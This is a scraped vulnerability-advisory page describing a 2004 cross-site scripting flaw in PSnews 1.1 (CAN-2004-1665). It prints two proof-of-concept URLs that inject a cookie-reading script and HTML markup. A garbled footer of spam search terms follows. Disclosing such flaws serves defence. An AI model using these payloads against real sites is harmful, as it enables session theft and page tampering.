about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PSNews No Parameter Cross-Site Scripting Vulnerability


Title PSNews No Parameter Cross-Site Scripting Vulnerability
Published 2004-09-05-12:00AM
Updated 2004-09-07-04:08PM
Class Input Validation Error
CVE   CAN-2004-1665
Remote  Yes
Local  No
Credit  Discovery is credited to Michal Blaszczak <wacky@nicponie.org>.
Vulnerable  PSnews PSnews 1.1
Not Vulnerable  
Code   No exploit is required.

The following proof of concept is available:
http://www.example.com/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>
http://www.example.com/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 20:55:14 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
letizia br NUED PHOTO netsupport www.carton com_artlin Www.petard NUED PHOTO ftpu site%253Aw Arab sex v news for c Filmsex Bugil+Dewi C...php?op news for c loubnan dc Www.wallpa Abd slam daftrix 2009-6-20 www.koodak maxcpm.inf hotmodels http:/www. news for c xxxanal Sexsy Girl maxcpm.inf Fhoto sexy www.77lp.c www.xallt1 news for c mambo Remo Sarah azha news for C hot modal www ,yah theme for Www.sex pi www.hkjyly Hot babes photo indi SEXYWALLPE sexy bikin ikescan ww.sec19.c www.mnv863 www.interc Sex free